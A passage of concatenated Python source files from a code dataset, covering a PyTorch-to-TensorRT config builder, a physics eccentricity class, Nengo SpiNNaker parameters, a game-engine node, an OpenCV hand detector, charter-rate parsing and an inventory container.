\"layerStyle\": \"in\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"weightKey\": weightKey,\n \"biasKey\": biasKey,\n }\n )\n\n if DEBUG:\n print(instance_norm_params)\n\n js_param = get_parameters()\n js_param[\"network\"].append(instance_norm_params)\n INLINE = False\n return x\n\n\n# torch.topk\ndef _topk(raw, input, k, dim=None, largest=True, sorted=True):\n global INLINE\n x = raw(input, k, dim, largest, sorted)\n INLINE = True\n name = log.add_layer(name=\"topk_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weight extract\n # add json params\n topk_params = dict(\n {\n \"layerStyle\": \"topk\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"TopKOperation\": \"kMAX\" if largest else \"kMIN\",\n \"k\": k,\n \"reduceAxes\": 1,\n \"outputIndex\": 0,\n }\n )\n if DEBUG:\n print(topk_params)\n js_param = get_parameters()\n js_param[\"network\"].append(topk_params)\n INLINE = False\n return x\n\n\n# torch.argmax\ndef _argmax(raw, input, dim, keepdim=False):\n global INLINE\n x = raw(input, dim, keepdim)\n INLINE = True\n name = log.add_layer(name=\"argmax_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weight extract\n # add json params\n argmax_params = dict(\n {\n \"layerStyle\": \"argMax\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"outputName\": \"argMaxTestout\",\n \"parameter\": {\n \"reShape\": [1, 8, 16],\n \"chooseInde\": dim,\n },\n }\n )\n if DEBUG:\n print(argmax_params)\n js_param = get_parameters()\n js_param[\"network\"].append(argmax_params)\n INLINE = False\n return x\n\n\n# torch.div\ndef _div(raw, input, other):\n global INLINE\n x = raw(input, other)\n INLINE = True\n name = log.add_layer(name=\"div_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # add json params\n div_params = dict(\n {\n \"layerStyle\": \"eltwise\",\n \"layerName\": name,\n \"eltType\": \"kDIV\",\n \"inputName\": [log.blobs(input, name), log.blobs(other, name)],\n }\n )\n if DEBUG:\n print(div_params)\n js_param = get_parameters()\n js_param[\"network\"].append(div_params)\n INLINE = False\n return x\n\n\n# torch.split\ndef _split(raw, tensor, split_size_or_sections, dim=0):\n global INLINE\n x = raw(tensor, split_size_or_sections, dim)\n INLINE = True\n name = log.add_layer(name=\"split_\")\n layerName = []\n start = 0\n slicePoint = [\n start,\n ]\n\n for i in range(len(x)):\n layerName.append(name + \"_idx{}\".format(i + 1))\n log.add_blobs([x[i]], name=layerName[-1])\n LayerOut_id[int(id(x[i]))] = layerName[-1]\n start += len(x[i])\n slicePoint.append(start)\n\n split_params = dict(\n {\n \"layerStyle\": \"slice\",\n \"layerName\": layerName,\n \"inputName\": log.blobs(tensor, name),\n \"axis\": dim,\n \"slicePoint\": slicePoint[:-1],\n }\n )\n if DEBUG:\n print(split_params)\n\n js_param = get_parameters()\n js_param[\"network\"].append(split_params)\n INLINE = False\n return x\n\n\n# torch.reshape\ndef _reshape(raw, input, shape):\n global INLINE\n x = raw(input, shape)\n INLINE = True\n name = log.add_layer(name=\"reshape_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # add json params\n reshape_params = dict(\n {\n \"layerStyle\": \"shuffle\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"isReshape\": True,\n \"reshapeFirst\": True,\n \"reshape\": shape,\n }\n )\n if DEBUG:\n print(reshape_params)\n js_param = get_parameters()\n js_param[\"network\"].append(reshape_params)\n INLINE = False\n return x\n\n\n# _add\ndef _add(input, *args):\n\n if isinstance(args[0], float) or isinstance(args[0], int):\n x = raw__add__(input, *args)\n return x\n\n global INLINE\n x = raw__add__(input, *args)\n INLINE = True\n name = log.add_layer(name=\"add_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n add_params = dict(\n {\n \"layerStyle\": \"eltwise\",\n \"layerName\": name,\n \"eltType\": \"kSUM\",\n \"inputName\": {\n \"inputName_1\": log.blobs(input, name),\n \"inputName_2\": log.blobs(args[0], name),\n },\n }\n )\n if DEBUG:\n print(\"__add__\")\n print(add_params)\n js_param = get_parameters()\n js_param[\"network\"].append(add_params)\n INLINE = False\n return x\n\n\n# _sub\ndef _sub(input, *args):\n global INLINE\n x = raw__sub__(input, *args)\n INLINE = True\n name = log.add_layer(name=\"sub_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n sub_params = dict(\n {\n \"layerStyle\": \"eltwise\",\n \"layerName\": name,\n \"eltType\": \"kSUB\",\n \"inputName\": [log.blobs(input, name), log.blobs(args[0], name)],\n }\n )\n\n if DEBUG:\n print(\"__sub__\")\n print(sub_params)\n\n js_param = get_parameters()\n js_param[\"network\"].append(sub_params)\n INLINE = False\n return x\n\n\n# expand_as\ndef _expand_as(input, *args):\n global INLINE\n x = raw__expand_as__(input, *args)\n INLINE = True\n name = log.add_layer(name=\"expand_as_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n expand_as_params = dict(\n {\n \"layerStyle\": \"expand\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"expand_as\": log.blobs(args[0], name),\n }\n )\n\n if DEBUG:\n print(\"__expand_as__\")\n print(expand_as_params)\n\n js_param = get_parameters()\n js_param[\"network\"].append(expand_as_params)\n INLINE = False\n return x\n\n\ndef _Hwsife(input, *agrs):\n pass\n\n\n# _permute\ndef _permute(input, *args):\n global INLINE\n x = raw__permute__(input, *args)\n INLINE = True\n name = log.add_layer(name=\"permute_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n permute_params = dict(\n {\n \"layerStype\": \"shuffle\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"isReshape\": False,\n \"reshapeFirst\": False,\n \"reshape\": None,\n \"isPermute\": True,\n \"permute\": args,\n }\n )\n if DEBUG:\n print(\"__permute__\")\n print(permute_params)\n\n js_param = get_parameters()\n js_param[\"network\"].append(permute_params)\n INLINE = False\n return x\n\n\nclass RegOp(object):\n \"\"\"\n Registration Operator\n \"\"\"\n\n def __init__(self, raw, replace, **kwargs):\n self.obj = replace\n self.raw = raw\n\n def __call__(self, *args, **kwargs):\n global PLULINE\n if INLINE:\n return self.raw(*args, **kwargs)\n\n else:\n\n for stack in traceback.walk_stack(None):\n flag = True\n state_stack = stack[0]\n # 第一层判断\n if \"self\" in state_stack.f_locals:\n module_name = type(state_stack.f_locals[\"self\"]).__name__\n if module_name in PLUGINS_LIST:\n \n module_id = 0\n if isinstance(state_stack.f_locals, dict):\n if \"x\" in state_stack.f_locals.keys():\n module_id = id(state_stack.f_locals[\"x\"])\n if \"input\" in state_stack.f_locals.keys():\n module_id = id(state_stack.f_locals[\"input\"])\n\n if module_name not in MODULE_DICT.keys():\n MODULE_DICT[module_name] = module_id\n # TODO \n print(\"module_name: \", module_name)\n # print(\"module_id: \", module_id)\n break\n\n if module_name in MODULE_DICT.keys():\n if MODULE_DICT[module_name] == module_id:\n break\n else:\n MODULE_DICT[module_name] = module_id\n # TODO\n print(\"module_name: \", module_name)\n print(\"module_id: \", module_id)\n PLULINE = True\n break\n\n # 向上查找\n while flag:\n state_stack = state_stack.f_back\n if state_stack.f_code.co_name == \"_call_impl\":\n flag = False\n\n # 往上一层判断\n state_stack = state_stack.f_back\n if \"self\" in state_stack.f_locals:\n module_name = type(state_stack.f_locals[\"self\"]).__name__\n if module_name in PLUGINS_LIST:\n \n module_id = 0\n if isinstance(state_stack.f_locals, dict):\n if \"x\" in state_stack.f_locals.keys():\n module_id = id(state_stack.f_locals[\"x\"])\n if \"input\" in state_stack.f_locals.keys():\n module_id = id(state_stack.f_locals[\"input\"])\n\n\n if module_name not in MODULE_DICT.keys():\n MODULE_DICT[module_name] = module_id\n # TODO \n print(\"module_name: \", module_name)\n print(\"module_id: \", module_id)\n break\n\n if module_name in MODULE_DICT.keys():\n if MODULE_DICT[module_name] == module_id:\n break\n else:\n MODULE_DICT[module_name] = module_id\n # TODO\n print(\"module_name: \", module_name)\n print(\"module_id: \", module_id)\n PLULINE = True\n break\n break\n\n out = self.obj(self.raw, *args, **kwargs)\n return out\n\n\ndef create_network():\n\n # 创建json param\n get_parameters()\n weight_path = os.path.join(cfg.WEIGHTS_DIR, cfg.MODELNAME, cfg.MODELNAME + \".weights\")\n if os.path.exists(weight_path):\n os.remove(weight_path)\n # 第一行添加多个空格,方便采用 seek,更改参数的个数\n with open(weight_path, \"w\") as file:\n file.write(\"0 \\n\")\n return\n\n\ndef reg_functional_op():\n \"\"\"\n Registration list about all torch.nn.functional support op\n \"\"\"\n F.conv2d = RegOp(F.conv2d, _conv2d)\n F.relu = RegOp(F.relu, _relu)\n F.leaky_relu = RegOp(F.leaky_relu, _leaky_relu)\n F.max_pool2d = RegOp(F.max_pool2d, _max_pool2d)\n F.avg_pool2d = RegOp(F.avg_pool2d, _avg_pool2d)\n F.linear = RegOp(F.linear, _linear)\n F.adaptive_avg_pool2d = RegOp(F.adaptive_avg_pool2d, _adaptive_avg_pool2d)\n F.softmax = RegOp(F.softmax, _softmax)\n F.conv_transpose2d = RegOp(F.conv_transpose2d, _conv_transpose2d)\n F.pad = RegOp(F.pad, _pad)\n F.interpolate = RegOp(F.interpolate, _interpolate)\n\n\ndef reg_torch_op():\n \"\"\"\n Registration list about all torch support op\n \"\"\"\n torch.batch_norm = RegOp(torch.batch_norm, _batch_norm)\n torch.sigmoid = RegOp(torch.sigmoid, _sigmoid)\n torch.flatten = RegOp(torch.flatten, _flatten)\n torch.cat = RegOp(torch.cat, _cat)\n torch.instance_norm = RegOp(torch.instance_norm, _instance_norm)\n torch.topk = RegOp(torch.topk, _topk)\n torch.argmax = RegOp(torch.argmax, _argmax)\n torch.matmul = RegOp(torch.div, _div)\n torch.split = RegOp(torch.split, _split)\n torch.reshape = RegOp(torch.reshape, _reshape)\n\n\ndef reg_torch_nn_op():\n \"\"\"\n Registration list about all torch.nn support op\n \"\"\"\n # Hsigmoid = RegOp(Hsigmoid, _Hsigmoid)\n\n\ndef reg_tensor_op():\n \"\"\"\n Registration list about all tensor support op\n \"\"\"\n for tensor_ in [torch.Tensor]:\n # c = a + b\n tensor_.__add__ = _add\n\n # c = a - b\n tensor_.__sub__ = _sub\n\n # # view (instead bu torch.reshape), permute for [TRT] shuffle layer\n # tensor_.permute = RegTensorOp(tensor_.permute, _permute)\n #\n # # expand_as for [TRT] expand layer\n # tensor_.expand_as = RegTensorOp(tensor_.expand_as, _expand_as)\n\n\ndef reg_plugin_op():\n \"\"\"\n Registration list about all plugin support op\n \"\"\"\n pass\n\n\nclass Build:\n \"\"\"\n build the configuration file.\n \"\"\"\n\n def __init__(self, model=None, input_var=None):\n self.model = model\n self.input = input_var\n create_network()\n reg_functional_op() # torch.nn.functional\n reg_torch_op() # torch\n reg_torch_nn_op() # torch.nn\n reg_tensor_op() # torch.Tensor\n reg_plugin_op() # plugin\n\n def build(self):\n\n print(\"starting ...\")\n INLINE = False\n self.model.eval()\n\n log.init([self.input])\n with torch.no_grad():\n output = self.model(self.input)\n INLINE = True\n\n js_param = get_parameters()\n # mark output layer\n if len(output) >= 2:\n for i, out in enumerate(output):\n for j, layer_param in enumerate(js_param[\"network\"]):\n if layer_param[\"layerName\"] == LayerOut_id[int(id(output))]:\n js_param[\"network\"][j][\"outputName\"] = f\"{cfg.OUTPUTBLOBNAME}_{i + 1}\"\n\n elif len(output) == 1:\n for j, layer_param in enumerate(js_param[\"network\"]):\n if layer_param[\"layerName\"] == LayerOut_id[int(id(output))]:\n js_param[\"network\"][j][\"outputName\"] = cfg.OUTPUTBLOBNAME\n break\n\n # save json file\n with open(os.path.join(cfg.JSON_FILE_DIR, cfg.MODELNAME, cfg.MODELNAME + \".json\"), \"w\") as file:\n json.dump(js_param, file, indent=4, ensure_ascii=False)\n\n print(\"successed! ...\")\n return\n","repo_name":"tianxin1024/generater","sub_path":"src/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":30171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"21902924290","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import division\n\nimport numpy as np\n\n__all__ = 'IC',\n\n\nclass IC(object):\n \"\"\"\n Initial condition entropy or energy density profile.\n\n :param array-like profile:\n The IC profile as a block-style grid.\n\n :param dxy:\n Size of each grid cell in fm, either a single value ``dxy = dx = dy``\n or a pair ``dxy = (dx, dy)``.\n :type dxy: float or pair of floats\n\n \"\"\"\n def __init__(self, profile, dxy):\n self._profile = np.asarray(profile, dtype=float)\n\n # save (x, y) steps\n try:\n self._dx, self._dy = dxy\n except (TypeError, ValueError):\n self._dx = self._dy = dxy\n\n # save (x, y) max\n ny, nx = self._profile.shape\n xmax = .5*self._dx*(nx - 1.)\n ymax = .5*self._dy*(ny - 1.)\n self._xymax = xmax, ymax\n\n # calculate and save center of mass\n X = np.linspace(-xmax, xmax, nx)\n Y = np.linspace(ymax, -ymax, ny)\n cm = np.array((\n np.inner(X, self._profile.sum(axis=0)),\n np.inner(Y, self._profile.sum(axis=1))\n ))\n cm /= self._profile.sum()\n self._cm = cm\n\n def sum(self):\n \"\"\"\n Total entropy or energy.\n\n \"\"\"\n return self._profile.sum() * self._dx * self._dy\n\n def cm(self):\n \"\"\"\n Center of mass coordinates, assuming the middle of the profile is\n (0, 0).\n\n \"\"\"\n return self._cm\n\n def ecc(self, n):\n r\"\"\"\n Calculate eccentricity harmonic `\\varepsilon_n`.\n\n :param int n: Eccentricity order.\n\n \"\"\"\n ny, nx = self._profile.shape\n xmax, ymax = self._xymax\n xcm, ycm = self._cm\n\n # create (X, Y) grids relative to CM\n Y, X = np.mgrid[ymax:-ymax:1j*ny, -xmax:xmax:1j*nx]\n X -= xcm\n Y -= ycm\n\n # create grid of weights = profile * R^n\n Rsq = X*X + Y*Y\n if n == 1:\n W = np.sqrt(Rsq, out=Rsq)\n elif n == 2:\n W = Rsq\n else:\n if n & 1: # odd n\n W = np.sqrt(Rsq)\n else: # even n\n W = np.copy(Rsq)\n # multiply by R^2 until W = R^n\n for _ in range(int((n-1)/2)):\n W *= Rsq\n W *= self._profile\n\n # create grid of e^{i*n*phi} * W\n i_n_phi = np.zeros_like(X, dtype=complex)\n np.arctan2(Y, X, out=i_n_phi.imag)\n i_n_phi.imag *= n\n exp_phi = np.exp(i_n_phi, out=i_n_phi)\n exp_phi *= W\n\n return abs(exp_phi.sum()) / W.sum()\n","repo_name":"Duke-QCD/hic","sub_path":"hic/initial.py","file_name":"initial.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"2471709195","text":"import numpy\nfrom spinn_utilities.overrides import overrides\nfrom nengo_spinnaker_gfe.connection_parameters. \\\n abstract_transmission_parameters import AbstractTransmissionParameters\nfrom nengo_spinnaker_gfe.connection_parameters. \\\n pass_through_node_transmission_parameters import \\\n PassthroughNodeTransmissionParameters\nfrom nengo_spinnaker_gfe.nengo_exceptions import \\\n NotConcatableTransmissionParameter\nfrom nengo_spinnaker_gfe.utility_objects.parameter_transform import \\\n ParameterTransform\nfrom nengo_spinnaker_gfe.connection_parameters.\\\n transmission_parameters_impl import TransmissionParametersImpl\n\ntry:\n from xxhash import xxh64 as fasthash\nexcept ImportError: # pragma: no cover\n from hashlib import md5 as fasthash\n import warnings\n warnings.warn(\"xxhash not installed, falling back to md5. \"\n \"Install xxhash to improve build performance.\", UserWarning)\n\n\nclass EnsembleTransmissionParameters(\n TransmissionParametersImpl, AbstractTransmissionParameters):\n \"\"\"Parameters describing information transmitted by an ensemble.\n\n Attributes\n ----------\n decoders : ndarray\n A matrix describing a decoding of the ensemble (sized N x D).\n learning_rule :\n Learning rule associated with the decoding.\n \"\"\"\n\n __slots__ = [\n #\n \"_decoders\",\n #\n \"_learning_rule\"]\n\n def __init__(self, decoders, transform, learning_rule=None):\n AbstractTransmissionParameters.__init__(self)\n TransmissionParametersImpl.__init__(self, transform)\n\n # Copy the decoders into a C-contiguous, read-only array\n self._decoders = numpy.array(decoders, order='C')\n self._decoders.flags[transform.FLAGS_NAME] = False\n\n # Store the learning rule\n self._learning_rule = learning_rule\n\n def __repr__(self):\n return \"{}:{}:{}\".format(\n self._transform, self._decoders, self._learning_rule)\n\n def __str__(self):\n return self.__repr__()\n\n @property\n def decoders(self):\n return self._decoders\n\n @property\n def learning_rule(self):\n return self._learning_rule\n\n @overrides(TransmissionParametersImpl.__eq__)\n def __eq__(self, other):\n # Two connection_parameters are equal only if they are of the same\n # type, and are equivalent in all other\n # fields.\n return (super(EnsembleTransmissionParameters, self).__eq__(other) and\n numpy.array_equal(self._decoders, other.decoders) and\n self._learning_rule == other.learning_rule)\n\n @overrides(TransmissionParametersImpl.__hash__)\n def __hash__(self):\n return hash((type(self), self._learning_rule, self._transform,\n fasthash(self._decoders).hexdigest()))\n\n @overrides(AbstractTransmissionParameters.concat)\n def concat(self, other):\n \"\"\"Create new connection connection_parameters which are the result of\n concatenating this connection with others.\n\n Parameters\n ----------\n other : PassthroughNodeTransmissionParameters\n Connection connection_parameters to add to the end of this connection.\n\n Returns\n -------\n EnsembleTransmissionParameters or None\n Either a new set of transmission connection_parameters, or None if the\n resulting transform contained no non-zero values.\n \"\"\"\n\n if not isinstance(other, PassthroughNodeTransmissionParameters):\n raise NotConcatableTransmissionParameter()\n\n # Get the outgoing transformation\n new_transform = self._transform.concat(other.transform)\n\n # Create a new connection (unless the resulting transform is empty,\n # in which case don't)\n if new_transform is not None:\n return EnsembleTransmissionParameters(\n self._decoders, new_transform, self._learning_rule\n )\n else:\n # The transform consisted entirely of zeros so return None.\n return None\n\n @property\n @overrides(TransmissionParametersImpl.as_global_inhibition_connection)\n def as_global_inhibition_connection(self):\n \"\"\"Construct a copy of the connection with the optimisation for global\n inhibition applied.\n \"\"\"\n assert self.supports_global_inhibition\n transform = self.full_transform(slice_out=False)[0, :]\n\n return EnsembleTransmissionParameters(\n self._decoders,\n ParameterTransform(\n size_in=self._decoders.shape[0], size_out=1,\n transform=transform, slice_in=self._transform.slice_in)\n )\n\n @property\n def full_decoders(self):\n \"\"\"Get the matrix corresponding to a combination of the decoders and\n the transform applied by the connection.\n \n @:return numpy array\n @:rtype numpy.array\n \"\"\"\n return numpy.dot(self.full_transform(slice_in=False, slice_out=False),\n self._decoders)\n","repo_name":"SpiNNakerManchester/NengoSpiNNaker","sub_path":"nengo_spinnaker_gfe/connection_parameters/ensemble_transmission_parameters.py","file_name":"ensemble_transmission_parameters.py","file_ext":"py","file_size_in_byte":5035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"25821522510","text":"from uplogic.nodes import ULActionNode\nfrom bge.types import KX_GameObject\nfrom bge.logic import sendMessage\nfrom uplogic.nodes import ULOutSocket\n\n\nclass ULSendMessage(ULActionNode):\n def __init__(self):\n ULActionNode.__init__(self)\n self.condition = None\n self.from_obj = None\n self.to_obj = None\n self.subject = None\n self.body = None\n self.done = False\n self.OUT = ULOutSocket(self, self.get_out)\n\n def get_out(self):\n return self.done\n\n def evaluate(self):\n self.done = False\n if not self.get_input(self.condition):\n return\n from_obj: KX_GameObject = self.get_input(self.from_obj)\n to_obj: KX_GameObject = self.get_input(self.to_obj)\n subject = self.get_input(self.subject)\n body = self.get_input(self.body)\n sendMessage(\n subject,\n body,\n to_obj.name if to_obj else '',\n from_obj.name if from_obj else ''\n )\n self.done = True\n","repo_name":"UPBGE/uplogic","sub_path":"uplogic/nodes/actions/sendmessage.py","file_name":"sendmessage.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"} +{"seq_id":"49838238036","text":"import numpy as np\r\nimport cv2\r\nimport os\r\nfrom matplotlib import pyplot as plt\r\n\r\n\r\nif __name__ == \"__main__\":\r\n dirr = './images'\r\n images = []\r\n # loop over the folder and insert each image to the list created above. \r\n for pic in os.listdir(dirr):\r\n img = cv2.imread(os.path.join(dirr,pic))\r\n if img is not None:\r\n images.append(img)\r\n \r\n for i in range(len(images)):\r\n # convert to gray, blur find edges\r\n gray = cv2.cvtColor(images[i],cv2.COLOR_BGR2GRAY)\r\n gray = cv2.medianBlur(gray, 7)\r\n gray=255-gray\r\n gray = cv2.normalize(gray, gray, 0, 255, cv2.NORM_MINMAX) \r\n gray = cv2.Canny(gray,90,110)\r\n kernel = np.ones((5,5),np.uint8)\r\n gray = cv2.dilate(gray,kernel,iterations = 1)\r\n rows = gray.shape[0]\r\n # now find circles or semi circles in the pictures which are the fingers \r\n circles = cv2.HoughCircles(gray, cv2.HOUGH_GRADIENT, 1.1, rows / 8,\r\n param1=30, param2=20,\r\n minRadius=1, maxRadius=30)\r\n if circles is not None:\r\n circles = np.uint16(np.around(circles))\r\n for j in circles[0, :]:\r\n center = (j[0], j[1])\r\n radius = j[2]\r\n cv2.circle(images[i], center, 3, (255, 0, 0), 3)\r\n \r\n\r\n\r\n\r\n plt.imshow(images[i])\r\n plt.title(i+1)\r\n plt.tight_layout()\r\n plt.show()","repo_name":"JameelSi/HandDetector","sub_path":"projectIM2021_1.py","file_name":"projectIM2021_1.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"44240348130","text":"# -*- coding: utf-8 -*-\n\nEAST_ZONES = ['east', 'feast', 'f.east']\n\n\ndef parse_arrival_zones(raw_arrival_zone):\n \"\"\"Split the raw arrival zones into a list of arrival zones, separated by '-'.\n\n Args:\n raw_arrival_zone (str):\n\n Returns:\n list(str)\n\n \"\"\"\n raw_arrival_zones = raw_arrival_zone.split('-')\n raw_arrival_zones_treated = []\n for zone in raw_arrival_zones:\n if any(zone.lower() == east_zone for east_zone in EAST_ZONES):\n raw_arrival_zones_treated.append('Eastern Asia')\n else:\n raw_arrival_zones_treated.append(zone)\n return raw_arrival_zones_treated\n\n\ndef create_voyage_raw_text(departure, arrival):\n \"\"\"From the origin and arrival zones, create the voyage raw text on the following form:\n departure/arrival.\n\n Args:\n departure (str):\n arrival (str):\n\n Returns:\n str\n\n Examples:\n >>> create_voyage_raw_text('foo', 'bar')\n 'foo/bar'\n >>> create_voyage_raw_text('foo', ['france', 'spain'])\n 'foo/france-spain'\n\n \"\"\"\n # in case we receive several arrivals instead of a single string\n if isinstance(arrival, list):\n arrival = '-'.join(arrival)\n\n return '/'.join([departure, arrival])\n\n\ndef parse_rate(rate, quantity=1):\n \"\"\"Try to parse human conventions for charter rates.\n\n Glossary:\n - PD: Per Day\n - WS: World Scale\n\n Examples:\n List of supported fomrmats.\n\n >>> parse_rate('17K PD')\n '17K PD'\n >>> parse_rate('550k')\n 550000.0\n >>> parse_rate('1.85M')\n 1850000.0\n >>> parse_rate('3.3 M')\n 3300000.0\n >>> parse_rate('435000lumpsum')\n 435000.0\n >>> parse_rate('USD 1,86M')\n 1860000.0\n >>> parse_rate('WS40')\n 40.0\n >>> parse_rate('WS 137,5')\n 137.5\n >>> parse_rate('USD 70 PT', 1000)\n 70000.0\n >>> # '-' or '/' seperated values mean it will depend from the\n >>> # destination, hence we cannot decide at this point\n >>> parse_rate('WS58.75/60.75')\n\n >>> parse_rate('USD12,5MT')\n\n >>> parse_rate('RNR')\n\n >>> parse_rate('OWN PROG')\n\n >>> parse_rate('WS25-23(CC/SS)')\n\n >>> parse_rate('US$1.8-2.3M')\n\n Args:\n rate (str):\n quantity (int):\n\n Return:\n float\n\n \"\"\"\n # don't process\n # TODO investigate why we don't need to process this one\n # TODO: ev: we should add tests for this function\n if 'PD' in rate:\n return rate\n\n # we can't do much with that (RNR means Rate Not Reported for rxample, and\n # we don't yet support USD12,5MT)\n if rate in ['RNR', 'COA', 'OWN PROG', 'OWN'] or 'MT' in rate:\n return None\n\n # clean up and normalize\n rate = rate.upper().strip().replace(' ', '')\n\n # Remove currency, since we distinguish rates and dollar prices using the order of magnitude.\n # do it before the rate_coeff choice since 'M' is in 'LUMPSUM'.\n for currency in ['LUMPSUM', 'US$', 'USD']:\n rate = rate.replace(currency, '')\n\n coeff = _choose_rate_coeff(rate, quantity) or 1.0\n # Now that we have the rate coefficient, remove coeff substring.\n for coeff_string in ['PT', 'M', 'K']:\n rate = rate.replace(coeff_string, '')\n\n if rate.startswith('W'):\n rate = _clean_ws_rate(rate)\n\n if '-' in rate or '/' in rate:\n return None\n\n # finally, the actual parsing\n return to_digit(rate) * coeff\n\n\ndef to_digit(value):\n \"\"\"\"Parse a numerical string to return a float.\n\n Args:\n value(str): human style float. See example for supported format\n\n Returns:\n float: parsed float value\n\n Raises:\n ValueError: If the given str wasn't a float\n\n Examples:\n Here is a list of illustrations of the format supported.\n\n >>> to_digit('3.3')\n 3.3\n >>> to_digit('1,2')\n 1.2\n >>> to_digit('3,3 M')\n 3300000.0\n >>> to_digit('4k')\n 4000.0\n >>> to_digit('foo') # doctest: +IGNORE_EXCEPTION_DETAIL\n Traceback (most recent call last):\n ...\n ValueError: could not convert string to float: FOO\n\n \"\"\"\n # remove space and normalize digit symbol\n value = value.upper().replace(' ', '').replace(',', '.')\n\n if 'M' in value:\n return float(value.replace('M', '')) * 1e6\n elif 'K' in value:\n return float(value.replace('K', '')) * 1e3\n else:\n return float(value)\n\n\ndef _clean_ws_rate(rate):\n for dirty in ['WS', 'W', '/RNR', '(CC/SS)']:\n rate = rate.replace(dirty, '')\n\n # TODO probably need to check the use-case and the implementation\n if ',' in rate and '/' in rate:\n # case: WS 32/35.5, 35/38.5 => 32/38.5\n partials = rate.split(',')\n partials = [r.split() for r in partials]\n partials = [item for r in partials for item in r]\n rate = '/'.join([partials[0], partials[-1]])\n\n return rate\n\n\ndef _choose_rate_coeff(rate, quantity=None):\n \"\"\"Convert human-formatted numeric abbreviations.\n\n Args:\n rate (str): human-like numeric\n quantity (int): ?????? (@seb)\n\n Returns:\n float: numeric translation of the given raw input\n\n Example:\n\n >>> _choose_rate_coeff('30K')\n 1000.0\n >>> _choose_rate_coeff('30M')\n 1000000.0\n >>> # special cases\n >>> _choose_rate_coeff('unknown')\n >>> _choose_rate_coeff('whateverPT', quantity=4.0)\n 4.0\n\n \"\"\"\n if 'PT' in rate:\n return quantity\n elif 'M' in rate:\n return 1e6\n elif 'K' in rate:\n return 1e3\n\n # give up if we don't understand the input\n return None\n","repo_name":"theHausdorffMetric/test","sub_path":"kp_scrapers/spiders/charters/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"13036885948","text":"# -*- coding: utf8 -*-\n\nfrom collections import defaultdict\nfrom pycraft.service.const import ContainerWindowID\nfrom pycraft.service.part.item import ItemID\nfrom .base import Container\n\n\nclass InventoryContainer(Container):\n \n SIZE = 36\n\n def __init__(self):\n super().__init__(ContainerWindowID.INVENTORY, self.SIZE)\n # TODO: indexを持たせる\n\n def add_item(self, item):\n \"\"\"Itemをslotsに保存する\n \n クライアントの実装では、indexが小さい方から詰めて保存する\n\n item : Item\n return : Itemを保存したslotsのindex(保存できないときは-1)\n \"\"\"\n empty_slot = None\n for i in range(self.SIZE):\n if self[i].id == item.id:\n count = self[i].count + item.count\n if count <= self[i].MAX_COUNT:\n self[i].count = count\n return i\n else:\n # 詰めた分は通知しなくてもクライアントが勝手に変更する\n diff = self[i].MAX_COUNT - self[i].count\n self[i].count = self[i].MAX_COUNT\n item.count -= diff\n elif self[i].id == ItemID.AIR:\n if empty_slot == None:\n empty_slot = i\n if empty_slot != None:\n self[empty_slot] = item\n return empty_slot\n return -1\n \n def use_item(self, i, target):\n \"\"\"Item を使用する\n \n i : slots の index\n target : Entity or Block (Item を使用する対象)\n return : Item が壊れたら True\n \"\"\"\n target.hit_item(self[i])\n if self[i].is_broken():\n self[i] = self.create_empty()\n return True\n return False\n\n def reduce_items(self, items):\n \"\"\"指定された Item を削除する\n \n return : generator((slot, is_empty))\n \"\"\"\n # 削除する個数を種類毎に数える\n counts = defaultdict(int)\n for item in items:\n if item.id != ItemID.AIR:\n counts[item.id] += item.count\n # 削除する\n updated = {}\n for slot, item in enumerate(self):\n if item.id in counts:\n before = self[slot].count\n self[slot].count -= counts[item.id]\n counts[item.id] = 0\n if self[slot].count < 0:\n counts[item.id] = -self[slot].count\n else:\n del counts[item.id]\n updated[slot] = before - self[slot].count\n # 足りなかった場合はロールバック\n if len(counts) > 0:\n for slot, count in updated:\n self[slot].count += count\n raise ValueError(\n '{name} does not have items.'.format(name=self.name))\n # 更新を確定し、個数 0 は empty に設定する\n for slot in updated.keys():\n if self[slot].count == 0:\n self[slot] = self.create_empty()\n yield slot, True\n else:\n yield slot, False\n\n\nclass ArmorContainer(Container):\n \n SIZE = 4\n\n def __init__(self):\n super().__init__(ContainerWindowID.ARMOR, self.SIZE)\n","repo_name":"nosix/PyCraft","sub_path":"src/pycraft/service/composite/container/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"ja","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"33436659842","text":"## Librerías\n\n# Procesamiento de datos\nimport numpy as np\nimport pandas as pd\n\n# Herramientas de gramática\nimport language_tool_python\nimport contractions\nimport re\n\n# Procesamiento de lenguaje natural\nimport nltk\nfrom textblob import TextBlob, Word\nfrom textblob.sentiments import PatternAnalyzer, NaiveBayesAnalyzer\n\n# Visualizaciones\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n## 